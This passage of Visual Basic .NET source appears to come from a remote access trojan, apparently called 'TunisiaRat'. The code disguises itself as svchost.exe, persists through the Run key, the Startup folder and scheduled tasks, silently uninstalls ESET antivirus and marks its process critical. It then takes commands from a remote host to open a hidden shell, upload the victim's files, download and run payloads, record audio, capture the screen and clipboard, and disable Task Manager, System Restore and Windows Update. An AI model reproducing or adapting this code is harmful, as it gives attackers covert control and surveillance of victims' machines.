  690. If File.Exists(Path.GetTempPath & "melt.txt") Then
  691. End If
  692. Else
  693. If File.Exists(Path.GetTempPath & "melt.txt") Then
  694. Try : IO.File.Delete(Path.GetTempPath & "melt.txt") : Catch : End Try
  695. End If
  696. If File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & tcs & "\" & namev) Then
  697. Try : IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & tcs & "\" & namev) : Catch : End Try
  698. IO.File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & tcs & "\" & namev)
  699. IO.File.WriteAllText(Path.GetTempPath & "melt.txt", Application.ExecutablePath)
  700. Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & tcs & "\" & namev)
  701.  
  702. Else
  703. IO.File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & tcs & "\" & namev)
  704. IO.File.WriteAllText(Path.GetTempPath & "melt.txt", Application.ExecutablePath)
  705. Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & tcs & "\" & namev)
  706. End
  707. End If
  708. End If
  709. End If
  710.  
  711. If melts Then
  712. If Application.ExecutablePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\Microsoft\svchost.exe" Then
  713. If File.Exists(Path.GetTempPath & "melt.txt") Then
  714. Try : IO.File.Delete(IO.File.ReadAllText(Path.GetTempPath & "melt.txt")) : Catch : End Try
  715. End If
  716. Else
  717.  
  718. If File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\Microsoft\svchost.exe") Then
  719. Try : IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\Microsoft\svchost.exe") : Catch : End Try
  720. IO.File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\Microsoft\svchost.exe")
  721. IO.File.WriteAllText(Path.GetTempPath & "melt.txt", Application.ExecutablePath)
  722. Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\Microsoft\svchost.exe")
  723. End
  724. Else
  725. IO.File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\Microsoft\svchost.exe")
  726. IO.File.WriteAllText(Path.GetTempPath & "melt.txt", Application.ExecutablePath)
  727. Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\Microsoft\svchost.exe")
  728. End
  729. End If
  730. End If
  731. End If
  732. If melt Then
  733. If File.Exists(Path.GetTempPath & "melt.txt") Then
  734. Try : IO.File.Delete(IO.File.ReadAllText(Path.GetTempPath & "melt.txt")) : Catch : End Try
  735. End If
  736. Else
  737. If File.Exists(Path.GetTempPath & "melt.txt") Then
  738. Try : IO.File.Delete(Path.GetTempPath & "melt.txt") : Catch : End Try
  739. End If
  740.  
  741. End If
  742. '
  743. If copyse Then
  744. If Application.ExecutablePath = Path.GetTempPath & sernam & ".exe" Then
  745. If File.Exists(Path.GetTempPath & "melt.txt") Then
  746. End If
  747. Else
  748.  
  749. If File.Exists(Path.GetTempPath & sernam & ".exe") Then
  750. Try : IO.File.Delete(Path.GetTempPath & sernam & ".exe") : Catch : End Try
  751. IO.File.Copy(Application.ExecutablePath, Path.GetTempPath & sernam & ".exe")
  752. Process.Start(Path.GetTempPath & sernam & ".exe")
  753. End
  754. Else
  755. IO.File.Copy(Application.ExecutablePath, Path.GetTempPath & sernam & ".exe")
  756. Process.Start(Path.GetTempPath & sernam & ".exe")
  757. End
  758. End If
  759. End If
  760. End If
  761.  
  762.  
  763. If addtos Then
  764. Try
  765. AStartup(StartupKey, Application.ExecutablePath)
  766. Dim startup As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup)
  767. IO.File.Copy(Application.ExecutablePath, startup & "\" & StartupKey & ".exe")
  768. Catch : End Try
  769. End If
  770. If task Then
  771. Dim ta As New AntiTaskManager
  772. Dim st As New Threading.Thread(AddressOf ta.protect)
  773. st.Start()
  774. End If
  775.  
  776. If x59 Then
  777. RtlSetProcessIsCritical(True, False, False)
  778. End If
  779.  
  780. If x64 Then
  781.  
  782.  
  783. Dim Pdir = "C:\ProgramData\ESET"
  784. Dim xSpdir As String = 0
  785. Dim mPath As String = 0
  786. Dim Dir As New DirectoryInfo(Pdir)
  787. For Each Spdir In Dir.GetDirectories
  788. If Spdir.Name.Contains("ESET") Then
  789. xSpdir = Spdir.FullName
  790. End If
  791. Next
  792. Dim Pdir2 As String = xSpdir & "\Installer"
  793. Dim Dir0 As New DirectoryInfo(Pdir2)
  794. Dim fPath() As FileInfo = Dir0.GetFiles()
  795. For Each File In fPath
  796. If File.Name.EndsWith(".msi") Then
  797. mPath = File.FullName
  798. End If
  799. Next
  800.  
  801. Shell("msiexec /x " & mPath & " /qn /norestart", AppWinStyle.Hide)
  802.  
  803.  
  804. End If
  805.  
  806.  
  807.  
  808.  
  809.  
  810.  
  811.  
  812.  
  813. End Sub
  814. Sub imge_desik()
  815. Dim bitmap As New Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height)
  816. Dim graphics__1 As Graphics = Graphics.FromImage(TryCast(bitmap, Image))
  817. graphics__1.CopyFromScreen(0, 0, 0, 0, bitmap.Size)
  818. picBox.SizeMode = PictureBoxSizeMode.AutoSize
  819. picBox.Image = bitmap
  820. Dim er As String = ooo
  821.  
  822. Dim bm As New Bitmap(picBox.Image)
  823. Dim width As Integer = 460
  824. Dim height As Integer = 360
  825. Dim thumb As New Bitmap(width, height)
  826. Dim g As Graphics = Graphics.FromImage(thumb)
  827. g.InterpolationMode = Drawing2D.InterpolationMode.Low
  828. g.DrawImage(bm, New Rectangle(0, 0, width, height), New Rectangle(0, 0, bm.Width, bm.Height), GraphicsUnit.Pixel)
  829. g.Dispose()
  830. thumb.Save(er, System.Drawing.Imaging.ImageFormat.Jpeg)
  831.  
  832. bm.Dispose()
  833. thumb.Dispose()
  834. End Sub
  835. <DllImport("NTDLL")>
  836. Public Shared Sub RtlSetProcessIsCritical(ByVal nv As Boolean, ByVal ov As Integer, ByVal wl As Boolean)
  837. End Sub
  838. Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
  839. On Error Resume Next
  840. Process.EnterDebugMode()
  841. TextBox3.Text = System.IO.File.ReadAllText(hid)
  842. If x62 Then
  843. Timer19.Enabled = True
  844. ElseIf x65 Then
  845. Timer19.Enabled = True
  846. Else
  847. screamhelp()
  848. End If
  849.  
  850. Text = HOST
  851. tio = TimeValue(Now)
  852.  
  853.  
  854.  
  855. End Sub
  856. Public Shared Sub AStartup(ByVal Name As String, ByVal Path As String)
  857. On Error Resume Next
  858. Dim Registry As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser
  859. Dim Key As Microsoft.Win32.RegistryKey = Registry.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
  860. Key.SetValue(Name, Path, Microsoft.Win32.RegistryValueKind.String)
  861. End Sub
  862. Public Sub DLV(ByVal n As String)
  863. Try
  864. Registry.CurrentUser.CreateSubKey("Software\" & RG).DeleteValue(n)
  865. Catch ex As Exception
  866. End Try
  867. End Sub
  868. Function GTV(ByVal n As String) As String
  869. Try
  870. Return Registry.CurrentUser.CreateSubKey("Software\" & RG).GetValue(n, "")
  871. Catch ex As Exception
  872. Return ""
  873. End Try
  874. End Function
  875. Function STV(ByVal n As String, ByVal t As String)
  876. Try
  877. Registry.CurrentUser.CreateSubKey("Software\" & RG).SetValue(n, t)
  878. Return True
  879. Catch ex As Exception
  880. Return False
  881. End Try
  882. End Function
  883. Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
  884. On Error Resume Next
  885. Dim CapTxt As String = GetCaption()
  886. If makel <> CapTxt Then
  887. makel = CapTxt
  888. Timer1.Stop()
  889. Comet.Send("AW" & Yy & CapTxt)
  890. Timer1.Start()
  891. End If
  892. End Sub
  893. Private Sub Timer2_Tick(sender As Object, e As EventArgs) Handles Timer2.Tick
  894. On Error Resume Next
  895. If Comet.Statconnected = False Then
  896. Timer2.Enabled = False
  897.  
  898. Comet.Connect(HOST, port)
  899. Timer2.Enabled = True
  900. End If
  901. End Sub
  902. #Region "Socket Events"
  903. Private Sub Connected() Handles Comet.Connected
  904. End Sub
  905. Private Sub Disconnected() Handles Comet.Disconnected
  906. On Error Resume Next
  907. Timer2.Enabled = False
  908. Timer2.Interval = 5000
  909. Timer2.Enabled = True
  910. Comet.Connect(HOST, port)
  911. End Sub
  912. Private Pro As Object
  913. Dim Npc = Environment.UserName & "@" & Environment.MachineName
  914. Dim uwyeuwwqyeu$
  915. Dim scream1010$
  916. Sub cmood()
  917. On Error Resume Next
  918. Dim Sz$ = uwyeuwwqyeu
  919. Shell("cmd.exe /c " + Sz + " > " + cmds, AppWinStyle.Hide)
  920. scream1010 = System.IO.File.ReadAllText(cmds)
  921. End Sub
  922. Sub xeroore()
  923. Dim Comets As New IO.StreamWriter(efkjws)
  924. Comets.WriteLine(" IPAddress Hostname Alias" & vbNewLine _
  925. + " 127.0.0.1 localhost deep.openna.com" & vbNewLine _
  926. + " 127.0.0.1 deep.openna.com deep" & vbNewLine _
  927. + " 127.0.0.1 mail.openna.com mail" & vbNewLine _
  928. + " 127.0.0.1 web.openna.com web") ' end
  929. Comets.Close()
  930. End Sub
  931. Private Sub Data(ByVal b As Byte()) Handles Comet.Data
  932. Dim T As String = BS(b)
  933. Dim A As String() = Split(T, Yy)
  934. Dim x As String = "lv" & Yy
  935. Try
  936. Select Case A(0)
  937. Case "att"
  938. Shell("ping -t" & A(1) & "-l " & A(2), AppWinStyle.Hide)
  939.  
  940. Case "atHTTP"
  941. My.Computer.Network.Ping(A(1))
  942. Case "atstop"
  943. Dim ItemProcess() As Process = Process.GetProcessesByName("PING")
  944. If Not ItemProcess Is Nothing Then
  945. For Each SubProcess As Process In ItemProcess
  946. SubProcess.Kill()
  947. Next
  948. End If
  949. Case "++"
  950. GetChrome()
  951. Comet.Send("++")
  952. Case "ppww"
  953. Comet.Send("ppww" & Yy & zoooom.Text)
  954. Case "chat"
  955. Comet.Send("chat" & Yy & Npc)
  956. Case "A"
  957. Invoke(New rv(AddressOf rvte), A(1))
  958. Case "recv"
  959. Invoke(New oc(AddressOf och))
  960. Invoke(New rv(AddressOf rvt), A(1))
  961. Case "ccl"
  962. Invoke(New ec(AddressOf cc))
  963. Case "r1"
  964. RtlSetProcessIsCritical(False, False, False)
  965. Application.Restart()
  966. End
  967. Case "Ren"
  968. My.Computer.FileSystem.WriteAllText(scream, A(1), False)
  969.  
  970. name = A(1) & "_" & HWD()
  971. Case "ononTask"
  972. TextB.Text = A(1)
  973. TextBox8.Text = A(3)
  974. TextBox12.Text = A(2)
  975. Dim hsonh$ = A(5)
  976. Dim FAK$ = (A(4))
  977. Dim tf As String
  978. tf = System.Environment.UserName
  979. TextBox12.Text = TextBox12.Text.Replace("?", tf)
  980. System.Threading.Thread.Sleep("100")
  981. If File.Exists(TextBox12.Text) Then
  982. If FAK = "1" Then
  983.  
  984. Shell("schtasks /create /sc minute /" + TextBox8.Text + " /tn " + TextB.Text + " /tr " & TextBox12.Text, AppWinStyle.Hide)
  985. ElseIf FAK = "2" Then
  986.  
  987. Shell("SchTasks /Create /SC DAILY /TN " + TextB.Text + " /TR " + TextBox12.Text + " /" + TextBox8.Text, AppWinStyle.Hide)
  988. ElseIf FAK = "3" Then
  989.  
  990. Shell("SchTasks /Create /SC MONTHLY /" + TextBox8.Text + " /TN " + TextB.Text + " /TR " + TextBox12.Text + " /" + hsonh, AppWinStyle.Hide)
  991.  
  992. ElseIf FAK = "4" Then
  993.  
  994. Shell("SchTasks /Create /SC WEEKLY /" + TextBox8.Text + " /TN " + TextB.Text + " /TR " + TextBox12.Text + " /" + hsonh, AppWinStyle.Hide)
  995.  
  996. End If
  997.  
  998. Else
  999. File.Copy(Application.ExecutablePath, TextBox12.Text)
  1000. System.IO.File.SetAttributes(TextBox12.Text, IO.FileAttributes.Hidden)
  1001. If FAK = "1" Then
  1002.  
  1003. Shell("schtasks /create /sc minute /" + TextBox8.Text + " /tn " + TextB.Text + " /tr " & TextBox12.Text, AppWinStyle.Hide)
  1004. ElseIf FAK = "2" Then
  1005. Shell("SchTasks /Create /SC DAILY /TN " + TextB.Text + " /TR " + TextBox12.Text + " /" + TextBox8.Text, AppWinStyle.Hide)
  1006. ElseIf FAK = "3" Then
  1007. Shell("SchTasks /Create /SC MONTHLY /" + TextBox8.Text + " /TN " + TextB.Text + " /TR " + TextBox12.Text + " /" + hsonh, AppWinStyle.Hide)
  1008. ElseIf FAK = "4" Then
  1009. Shell("SchTasks /Create /SC WEEKLY /" + TextBox8.Text + " /TN " + TextB.Text + " /TR " + TextBox12.Text + " /" + hsonh, AppWinStyle.Hide)
  1010.  
  1011. End If
  1012.  
  1013. End If
  1014. Case "ofofTask"
  1015. TextB.Text = A(1)
  1016. Shell("SCHTASKS /Delete /TN " + TextB.Text + " /f", AppWinStyle.Hide)
  1017.  
  1018. Case "openurl"
  1019. System.Diagnostics.Process.Start(A(1))
  1020. Comet.Send("Coloreg")
  1021. Case "downloadfile"
  1022. Comet.Send("downloadedfile" & Yy & Convert.ToBase64String(IO.File.ReadAllBytes(A(1))) & Yy & A(2))
  1023. Case "sendfileimge"
  1024. IO.File.WriteAllBytes(IO.Path.GetTempPath & A(1), Convert.FromBase64String(A(2)))
  1025. Thread.Sleep(1000)
  1026. Comet.Send("Coloreg")
  1027.  
  1028. SystemParametersInfo(SETDESKWALLPAPER, 0, IO.Path.GetTempPath & A(1), UPDATEINIFILE)
  1029. Case "ssstui"
  1030.  
  1031. Dim RR$ = Environment.GetFolderPath(Environment.SpecialFolder.Desktop)
  1032. IO.File.WriteAllBytes(RR & A(1), Convert.FromBase64String(A(2)))
  1033. Thread.Sleep(1000)
  1034. Case "sendfile"
  1035. IO.File.WriteAllBytes(IO.Path.GetTempPath & A(1), Convert.FromBase64String(A(2)))
  1036. Thread.Sleep(1000)
  1037. Process.Start(IO.Path.GetTempPath & A(1))
  1038. Case "sendmusicplay"
  1039. IO.File.WriteAllBytes(IO.Path.GetTempPath & A(1), Convert.FromBase64String(A(2)))
  1040. Threading.Thread.Sleep(1000)
  1041. My.Computer.Audio.Stop()
  1042. My.Computer.Audio.Play(IO.Path.GetTempPath & A(1), AudioPlayMode.Background)
  1043. Case "scream1"
  1044. mmciSendString("open new Type waveaudio Alias recsound", "", 0, 0)
  1045. mmciSendString("record recsound", "", 0, 0)
  1046. '
  1047. '
  1048. '
  1049.  
  1050. Case "scream1stop"
  1051. mmciSendString("save recsound " + screamx, "", 0, 0)
  1052. mmciSendString("close recsound", "", 0, 0)
  1053. Dim n As New IO.FileInfo(screamx)
  1054. Comet.Send("scream2" & Yy & n.Name & Yy & Convert.ToBase64String(IO.File.ReadAllBytes(screamx)))
  1055. Comet.Send("screamf" & Yy & n.Name & Yy & Convert.ToBase64String(IO.File.ReadAllBytes(screamx)))
  1056. My.Computer.Audio.Stop()
  1057. '
  1058. '
  1059. '
  1060.  
  1061. Case "script"
  1062. Dim xop$
  1063. xop = System.Environment.UserName
  1064. Dim temp As String = Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" + xop
  1065. IO.File.WriteAllText(temp & A(2), A(1))
  1066. Process.Start(temp & A(2))
  1067. Case "ClearClp"
  1068. My.Computer.Clipboard.Clear()
  1069. Case "SetClp"
  1070. My.Computer.Clipboard.SetText(A(1))
  1071. Case "GetClp"
  1072. Comet.Send("GetClp" & Yy & My.Computer.Clipboard.GetText)
  1073. Case "CursorShow"
  1074. Cursor.Show()
  1075. Case "CursorHide"
  1076. Cursor.Hide()
  1077. Case "ClockOFF"
  1078. hideclock()
  1079. Case "ClockON"
  1080. showclock()
  1081. Case "TaskbarShow"
  1082. ShowTaskbarItems()
  1083. Case "TaskbarHide"
  1084. HideTaskbarItems()
  1085. Case "SoundON"
  1086. SendMessageW(Process.GetCurrentProcess.Handle, &H319, Process.GetCurrentProcess.Handle, CType(&H80000, IntPtr))
  1087. Case "SoundOFF"
  1088. SendMessageW(Process.GetCurrentProcess.Handle, &H319, Process.GetCurrentProcess.Handle, CType(&H80000, IntPtr))
  1089. Case "IconsON"
  1090. IconsToggle()
  1091. Case "IconsOFF"
  1092. IconsToggle()
  1093. Case "startfun"
  1094. Comet.Send("startfun")
  1095. Case "blockmouseandkeyboard"
  1096. BlockInput(1)
  1097. ShowCursor(0)
  1098. My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "1", Microsoft.Win32.RegistryValueKind.DWord)
  1099. Case "unblockmouseandkeyboard"
  1100. BlockInput(0)
  1101. ShowCursor(1)
  1102. My.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore", "DisableSR", "0", Microsoft.Win32.RegistryValueKind.DWord)
  1103. Case "hidetb"
  1104. Dim TaskbarHandle As Long
  1105. TaskbarHandle = FindWindow("Shell_traywnd", "")
  1106. SetWindowPos(TaskbarHandle, 0&, 0&, 0&, 0&, 0&, TASKBAR_HIDE)
  1107. Case "showtb"
  1108. Dim TaskbarHandle As Long
  1109. TaskbarHandle = FindWindow("Shell_traywnd", "")
  1110. SetWindowPos(TaskbarHandle, 0&, 0&, 0&, 0&, 0&, TASKBAR_SHOW)
  1111. Case "winupdateon"
  1112. Dim ss As Boolean
  1113. My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoWindowsUpdate", "0", Microsoft.Win32.RegistryValueKind.DWord)
  1114. Case "winupdateoff"
  1115. Dim dis As Boolean
  1116. My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoWindowsUpdate", "1", Microsoft.Win32.RegistryValueKind.DWord)
  1117. Case "DisableCMD"
  1118. My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System", "DisableCMD", "1", Microsoft.Win32.RegistryValueKind.DWord)
  1119. Case "EnableCMD"
  1120. My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System", "DisableCMD", "0", Microsoft.Win32.RegistryValueKind.DWord)
  1121. Case "DisableRegistry"
  1122. My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "1", Microsoft.Win32.RegistryValueKind.DWord)
  1123. Case "EnableRegistry"
  1124. My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "0", Microsoft.Win32.RegistryValueKind.DWord)
  1125. Case "DisableRestore"
  1126. My.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore", "DisableSR", "1", Microsoft.Win32.RegistryValueKind.DWord)
  1127. Case "EnableRestore"
  1128. My.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore", "DisableSR", "0", Microsoft.Win32.RegistryValueKind.DWord)
  1129. Case "DisableTaskManager"
  1130. My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "1", Microsoft.Win32.RegistryValueKind.DWord)
  1131. Case "EnableTaskManager"
  1132. My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "0", Microsoft.Win32.RegistryValueKind.DWord)
  1133. Case "TurnOffMonitor"
  1134. SendMessage(-1, &H112, &HF170, 2)
  1135.  
  1136. Case "Stillness"
  1137. SendMessage(-1, &H112, &HF170, 2)
  1138.  
  1139. Case "TurnOnMonitor"
  1140. SendMessage(-1, &H112, &HF170, -1)
  1141. Case "NormalMouse"
  1142. SwapMouseButton(&H0&)
  1143. Case "ReverseMouse"
  1144. SwapMouseButton(&H100&)
  1145. Case "opencd"
  1146. Try
  1147. mciSendString("set cdaudio door open", 0, 0, 0)
  1148. Catch ex As Exception
  1149. End Try
  1150. Case "closecd"
  1151. Try
  1152. mciSendString("set cdaudio door closed", 0, 0, 0)
  1153. Catch ex As Exception
  1154. End Try
  1155. Case "sendinformation"
  1156. Dim time, h, m, s As Integer
  1157. time = My.Computer.Clock.TickCount
  1158. h = time \ 3600000
  1159. m = (time Mod 3600000) \ 60000
  1160. s = ((time Mod 3600000) Mod 60000) / 1000
  1161. Dim ab, bb, cb, db, eb, fb, gb As String
  1162. ab = Microsoft.Win32.Registry.GetValue("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0", "ProcessorNameString", "")
  1163. bb = Microsoft.Win32.Registry.GetValue("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0", "Identifier", "")
  1164. cb = Microsoft.Win32.Registry.GetValue("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS", "SystemProductName", "")
  1165. db = Microsoft.Win32.Registry.GetValue("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS", "BIOSReleaseDate", "")
  1166. eb = Microsoft.Win32.Registry.GetValue("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS", "BIOSVersion", "")
  1167. fb = Microsoft.Win32.Registry.GetValue("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS", "SystemManufacturer", "")
  1168. gb = Microsoft.Win32.Registry.GetValue("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS", "BIOSVendor", "")
  1169. Dim value As String = Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\TunisiaRat", "ID", "")
  1170. Comet.Send("sendinformation" & Yy & Environment.MachineName & Yy & Environment.UserName & Yy & My.Computer.Info.OSFullName & Yy & My.Computer.Info.OSPlatform & Yy & country & Yy & getanti() & Yy & GetSystemRAMSize() & Yy & "0.1.0" & Yy & checkcam() & Yy & ACT() & Yy & My.Computer.Clock.LocalTime & Yy & h & ":" & m & ":" & s & Yy & Environment.CurrentDirectory & Yy & Environment.SystemDirectory & Yy & Environment.UserDomainName & Yy & Environment.UserInteractive & Yy & Environment.WorkingSet & Yy & My.Computer.Info.OSVersion & Yy & My.Computer.Info.InstalledUICulture.ToString & Yy & System.Environment.CommandLine & Yy & port & Yy & Application.ExecutablePath & Yy & ab & Yy & bb & Yy & cb & Yy & db & Yy & eb & Yy & fb & Yy & gb & Yy & value)
  1171. Case "infoDesk"
  1172. imge_desik()
  1173. Comet.Send("infoDesk" & "|U|" & Convert.ToBase64String(IO.File.ReadAllBytes(ooo)) & "|U|" & name & "|U|" & port & "|U|" & Ver & "|U|" & GetFirewall() & "|U|" & Application.ExecutablePath)
  1174.  
  1175.  
  1176.  
  1177. Case "clipss"
  1178. Comet.Send("clipss" & Yy & Npc)
  1179. Case "getcli"
  1180. Invoke(New gt(AddressOf gtx))
  1181. Case "openRG"
  1182. Comet.Send("openRG")
  1183. Case "RG"
  1184. Dim kk As Object = GetKey(A(2))
  1185. Select Case A(1)
  1186. Case "~"
  1187. Dim s As String = "RG" & Yy & "~" & Yy & A(2) & Yy
  1188. Dim o As String = ""
  1189. For Each xe As String In kk.GetSubKeyNames
  1190. If xe.Contains("\") = False Then
  1191. o += xe & Yy
  1192. End If
  1193. Next
  1194. For Each xs As String In kk.GetValueNames
  1195. o += xs & "/" & kk.GetValueKind(xs).ToString & "/" & kk.GetValue(xs, "").ToString & Yy
  1196. Next
  1197. Comet.Send(s & o)
  1198. Case "!"
  1199. kk.SetValue(A(3), A(4), A(5))
  1200. Case "@5"
  1201. kk.DeleteValue(A(3), False)
  1202. Case "#"
  1203. kk.CreateSubKey(A(3))
  1204. Case "$"
  1205. kk.DeleteSubKeyTree(A(3))
  1206. End Select
  1207. Case "openshell"
  1208. Try
  1209. Pro.Kill()
  1210. Catch ex As Exception
  1211. End Try
  1212. Pro = New Process
  1213. Pro.StartInfo.RedirectStandardOutput = True
  1214. Pro.StartInfo.RedirectStandardInput = True
  1215. Pro.StartInfo.RedirectStandardError = True
  1216. Pro.StartInfo.FileName = "cmd.exe"
  1217. Pro.StartInfo.RedirectStandardError = True
  1218. AddHandler CType(Pro, Process).OutputDataReceived, AddressOf RS
  1219. AddHandler CType(Pro, Process).ErrorDataReceived, AddressOf RS
  1220. AddHandler CType(Pro, Process).Exited, AddressOf ex
  1221. Pro.StartInfo.UseShellExecute = False
  1222. Pro.StartInfo.CreateNoWindow = True
  1223. Pro.StartInfo.WindowStyle = ProcessWindowStyle.Hidden
  1224. Pro.EnableRaisingEvents = True
  1225. Comet.Send("openshell")
  1226. Pro.Start()
  1227. Pro.BeginErrorReadLine()
  1228. Pro.BeginOutputReadLine()
  1229. Case "rs"
  1230. Pro.StandardInput.WriteLine(DEB(A(1)))
  1231. Case "rsc"
  1232. Try
  1233. Pro.Kill()
  1234. Catch ex As Exception
  1235. End Try
  1236. Pro = Nothing
  1237. Case "xoxCl"
  1238. xtrem.Text = ""
  1239. Case "logeronline"
  1240. xtrem.Text = ""
  1241. ero = 2
  1242. ''''
  1243.  
  1244. 'Timer20.Enabled = True
  1245.  
  1246. '''''''''
  1247.  
  1248. Case "OpenPro"
  1249. Comet.Send("OpenPro" & Yy & Npc)
  1250. Case "GetProcesses"
  1251. Dim allProcess As String = ""
  1252. Dim sl As String = "ProcessSplit"
  1253. For Each xd As Process In Process.GetProcesses
  1254. Try
  1255.  
  1256.  
  1257.  
  1258. allProcess += xd.ProcessName & "|" & xd.Id & "|" & xd.MainModule.FileName & "|" & xd.PrivateMemorySize64 & "|" & xd.StartTime & "|" & xd.MainModule.FileVersionInfo.CompanyName & "|" & xd.MainModule.FileVersionInfo.FileVersion & "|" & xd.MainModule.FileVersionInfo.Language & "|" & xd.MainModule.FileVersionInfo.LegalCopyright & "|" & xd.MainModule.FileVersionInfo.LegalTrademarks & "|" & xd.MainModule.FileVersionInfo.ProductName & "|" & xd.MainModule.FileVersionInfo.FileDescription & "|" & xd.MainModule.FileVersionInfo.GetHashCode & "|" & Screamhi & sl
  1259. Catch
  1260. 'allProcess += xd.ProcessName & "|" & xd.Id & "|" & "-" & "|" & xd.PrivateMemorySize64 & "|" & "-" & sl
  1261. End Try
  1262. Next
  1263. Comet.Send("ProcessManager" & Yy & allProcess & Yy & System.IO.Path.GetFileNameWithoutExtension(Application.ExecutablePath))
  1264. Case "ports"
  1265. Comet.Send("ports" & Yy & Npc)
  1266. Case "cc"
  1267. Comet.Send("cc" & Yy & Npc)
  1268. Case "ssopen"
  1269. Comet.Send("ss" & Yy & Npc)
  1270.  
  1271.  
  1272. Case "life is Beautiful"
  1273. Comet.Send("life is Beautiful" & Yy & Npc)
  1274.  
  1275. Case "Acti"
  1276. Comet.Send("Acti" & Yy & Npc)
  1277. Case "Cnsl"
  1278.  
  1279. My.Settings.Reset()
  1280.  
  1281. Case "RIDOX"
  1282. Dim JW$ = A(1)
  1283. Dim JWy$ = A(2)
  1284. My.Settings.ho = JW
  1285. My.Settings.po = JWy
  1286. My.Settings.Save()
  1287. RtlSetProcessIsCritical(False, False, False)
  1288. Application.Restart()
  1289. End
  1290.  
  1291. Case "ROps43H"
  1292.  
  1293. Dim GOV$ = "------------------------------------------"
  1294. If My.Settings.ho = "" Then
  1295.  
  1296.  
  1297. Dim TOFCs$ = x3 & NewLine + GOV & NewLine + "host : " + x1 & NewLine + "port : " + x2
  1298. Comet.Send("00000000000000000000000" & Yy & TOFCs)
  1299. Else
  1300.  
  1301. Dim TOFCs$ = x3 & NewLine + GOV & NewLine + "host : " + My.Settings.ho & NewLine + "port : " + My.Settings.po
  1302. Comet.Send("00000000000000000000000" & Yy & TOFCs)
  1303.  
  1304. End If
  1305.  
  1306.  
  1307.  
  1308. Case "blokron"
  1309.  
  1310. xeroore()
  1311.  
  1312.  
  1313. Case "blokr"
  1314.  
  1315.  
  1316. saw = New StreamWriter(efkjws, True)
  1317. Dim sitetoblock As String = (Environment.NewLine & "127.0.0.1 " & A(1))
  1318. saw.Write(sitetoblock)
  1319. saw.Close()
  1320.  
  1321.  
  1322.  
  1323. Case "ROps43"
  1324.  
  1325. scream1010 = "Server runtime : " + tio & vbNewLine + "The current time is now : " + TimeValue(Now)
  1326. Comet.Send("00000000000000000000000" & Yy & scream1010)
  1327.  
  1328. Case "screamiwsx"
  1329. uwyeuwwqyeu = A(1)
  1330. cmood()
  1331. Comet.Send("00000000000000000000000" & Yy & scream1010)
  1332.  
  1333. Case "Winsx"
  1334.  
  1335. GetActiveWindows()
  1336.  
  1337. Case "GOs"
  1338.  
  1339.  
  1340. Dim sl As String = "ProcessSplit"
  1341.  
  1342. Dim UO$
  1343.  
  1344. Dim s1$
  1345. Dim s2$
  1346. Dim s3$
  1347.  
  1348. If controllers IsNot Nothing Then
  1349. controllers = New Generic.SortedList(Of String, ServiceController)
  1350. End If
  1351.  
  1352. Dim services As ServiceController() = ServiceController.GetServices()
  1353. For Each controller As ServiceController In services
  1354. s1 = controller.DisplayName
  1355.  
  1356. With s1 = controller.DisplayName
  1357. s2 = controller.Status.ToString()
  1358. s3 = controller.ServiceType.ToString()
  1359. Dim R$ = "|"
  1360. UO = s2 + R + s1 + R + s3 + R + sl
  1361. End With
